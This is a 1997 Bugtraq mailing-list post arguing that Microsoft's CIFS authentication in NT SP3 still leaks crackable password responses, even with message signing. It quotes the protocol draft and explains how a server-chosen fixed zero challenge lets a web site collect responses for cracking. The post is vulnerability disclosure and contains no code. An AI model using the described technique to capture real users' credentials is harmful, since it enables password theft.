[4490] in bugtraq
Re: CIFS Changes
daemon@ATHENA.MIT.EDU (Aaron Spangler)
Fri May 16 18:35:34 1997
Date: Fri, 16 May 1997 14:57:35 PDT
Reply-To: Aaron Spangler <pokee@MAXWELL.EE.WASHINGTON.EDU>
From: Aaron Spangler <pokee@MAXWELL.EE.WASHINGTON.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199704212304.QAA05494@compton.ee.washington.edu>; from "Aaron
Spangler" at Apr 21, 97 4:04 pm
A lot of people have been asking me about Whether the new CIFS implementation
in SP3 is vulnerable. Number one, it is not enabled by default, but even
if it was, I suspect it is just as vulnerable EVEN IF THERE IS MESSAGE
SIGNING!
I have not yet had time to test it, but here is the MS whitepapers on the
new protocol.
It does not make a difference whether signing is enabled or disabled.
Signing does not come into play until AFTER the password has been exchanged.
So the users password can still be grabbed using a Web Site.
> Exceperts take from "CIFS-Auth" dated Mar 28 Draft 4 section 1.4
> From Microsoft's FTP Site.
>
> 1.4 Session authentication protocol
>
> 1. The client computes the session keys from the user's password,
> initializes its sequence number, and sends a session negotiation request
> to the server.
>
> C: Ks = MD4(P(U))
> Ka = [Ks]<7>
> Kb = [Ks]<7:7>
> Kc = [Ks]<2:14>, Z(5)
Above just means the client has a Hashed NT Password. Usually stored in the
SAM database in the registry.
>
> C->S: Mneg
>
> 2. The server responds with the features negotiated, and a challenge:
>
The server sets CS=Z(8) (challenge is fized to 8 bytes of zeros)
The server could even select the most secure protocols:
NEGOTIATE_SECURITY_USER_LEVEL || (not share level)
NEGOTIATE_SECURITY_CHALLENGE_RESPONSE || (no plaintext passwords)
NEGOTIATE_SECURITY_SIGNATURES_ENABLED || (will do the MAC thing)
NEGOTIATE_SECURITY_SIGNATURES_REQUIRED (insist on MAC thing)
And send it off as options to Mnegr to the client.
> S->C: Mnegr, CS
>
> 3. The client computes a response to the challenge. It computes the MAC
> key, and the MAC of the message, and send the user name, challenge
> response, and session request parameters to the server. Its message
> uses a sequence number of 0, and it expects a sequence number of 1 to be
> used in the response.
>
> C: R = {CS}Ka, {CS}Kb, {CS}Kc
> Km = Ks, R
> SN = 0
> MC = [MD5(Km, SN, Msess, U, R)]<8>
> SN = 1
>
> C->S: Msess, U, R, MC
Notice that the client gives R to server, R is the same thing I have been
collecting on my web page. Easy enough to crack.
--
Aaron Spangler EE Unix System Administrator
Electrical Engineering FT-10 pokee@ee.washington.edu
University of Washington Phone (206) 543-8984
Box 352500 or (206) 543-2523
Seattle, WA 98195-2500 Fax (206) 543-3842
